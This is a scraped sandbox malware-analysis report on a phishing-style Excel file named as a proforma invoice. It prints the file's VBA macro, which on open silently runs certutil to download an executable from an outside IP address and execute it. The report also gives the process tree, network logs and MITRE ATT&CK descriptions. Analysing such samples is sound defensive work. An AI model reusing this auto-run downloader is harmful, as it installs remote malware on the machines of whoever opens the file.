Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	15.0300

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 169

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	169
Data ASCII:	. . A t t r i b u t . e V B _ N a m . e = " S h e @ e t 1 " . . . B . a s . t 0 { 0 0 0 2 0 8 2 0 - . . . F C . . . . 4 6 } . \| G l o b a l . S p . a c . F a l s e . . % C r e a t a b . l . . P r e d e c $ l a . . I d . # T r . u . " E x p o s e . . . . @ T e m p l a t e D e r i v . % . C u s t o m i z . D 2
Data Raw:	01 a5 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 53 68 65 40 65 74 31 22 0d 0a 0a e8 42 04 61 73 02 74 30 7b 30 30 30 c0 32 30 38 32 30 2d 00 20 04 08 46 43 05 12 03 00 34 36 7d 0d 7c 47 20 6c 6f 62 61 6c 01 c4 53 70 04 61 63 01 92 46 61 6c 73 65 01 0c 25 43 72 65 61 74 61 62 02 6c 15 1f 50 72 65 64 65 63 24 6c 61 00 06 49 64 00 23 54 72 02 75 0d 22

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 348

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	348
Data ASCII:	. X . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . B a s . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . \| G l . o b a l . S p a c . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . C u s t o m i z D . 2 P . . S u b . . _ O p e n ( ) . P I D . S h . e l l ( " c m d . / c c e r t . u t i l . e x e . - u r l c a c . h . s p l i t . - f " " h t t . p : / / 3 7 . 1 . 3
Data Raw:	01 58 b1 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://37.139.128.94/dx/Doc703002702.exe"" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe", vbHide)
End Sub

VBA File Name: Workbook.cls, Stream Size: 171

General
Stream Path:	VBA/Workbook
VBA File Name:	Workbook.cls
Stream Size:	171
Data ASCII:	. . A t t r i b u t . e V B _ N a m . e = " W o r . k b o o k " . . . . B a s . \| 0 { 0 . 0 0 2 0 8 2 0 - . . . . C . . . . 4 6 } . \| G l o b a l . . S p a c . F a l . s e . % C r e a t . a b l . . P r e d e c l a . . I d . # . T r u . " E x p o . s e . . . @ T e m p . l a t e D e r i . v . % C u s t o m . i z D 2
Data Raw:	01 a7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 57 6f 72 00 6b 62 6f 6f 6b 22 0d 0a 11 0a f8 42 61 73 02 7c 30 7b 30 00 30 30 32 30 38 32 30 2d 1b 00 20 04 08 43 05 12 03 00 34 36 7d 81 0d 7c 47 6c 6f 62 61 6c 01 c8 10 53 70 61 63 01 92 46 61 6c 04 73 65 0c 25 43 72 65 61 74 08 61 62 6c 15 1f 50 72 65 64 90 65 63 6c 61 00 06 49 64 00 23 08 54 72 75

VBA Code

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.113051092766481
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 2 9 B 6 2 B 3 F 2 F 3 F 2 F 3 B 3 3 3 B 3 3 " . . D P B = " 5 D 5 F F 1 5 6 1 3 A
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30

Stream Path: PROJECTwm, File Type: data, Stream Size: 89

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	89
Entropy:	2.9727073125739816
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . W o r k b o o k . W . o . r . k . b . o . o . k . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 57 6f 72 6b 62 6f 6f 6b 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 228

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	228
Entropy:	5.841988935203954
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . Q . T . . . " < . . . . . D . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . o . r . k . b . . o . . . . / 2 . / . . u H . . 1 . . . , C * " . + . . n S h e e t 1 G 7 S . e . t ! . . 2 . 7 . . . . . { . . 2 . = . . .
Data Raw:	01 e0 b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 03 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2022 14:02:12.204134941 CET	49173	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:15.208918095 CET	49173	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:21.215464115 CET	49173	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:33.230806112 CET	49174	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:36.239480972 CET	49174	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:42.246038914 CET	49174	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:56.745254040 CET	49175	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:02:59.750771046 CET	49175	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:03:05.757299900 CET	49175	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:03:17.757678986 CET	49176	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:03:20.750483990 CET	49176	80	192.168.2.22	37.139.128.94
Nov 14, 2022 14:03:26.756911993 CET	49176	80	192.168.2.22	37.139.128.94

Statistics

CPU Usage

• EXCEL.EXE
• cmd.exe
• certutil.exe

Click to jump to process

Memory Usage

• EXCEL.EXE
• cmd.exe
• certutil.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	14:02:14
Start date:	14/11/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f8c0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	14:02:16
Start date:	14/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe
Imagebase:	0x4a090000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	14:02:16
Start date:	14/11/2022
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe
Imagebase:	0xffce0000
File size:	1192448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Proforma Invoice 3002702.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14BBD7F1.png

C:\Users\user\AppData\Local\Temp\C0DF.tmp

C:\Users\user\AppData\Local\Temp\~DFFE94407FDA79CF28.TMP

C:\Users\user\Desktop\~$Proforma Invoice 3002702.xlsm

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/745559/sample/Proforma Invoice 3002702.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 169

General

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 348

General

VBA Code

VBA File Name: Workbook.cls, Stream Size: 171

General

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529

General

Stream Path: PROJECTwm, File Type: data, Stream Size: 89

Windows Analysis Report
Proforma Invoice 3002702.xlsm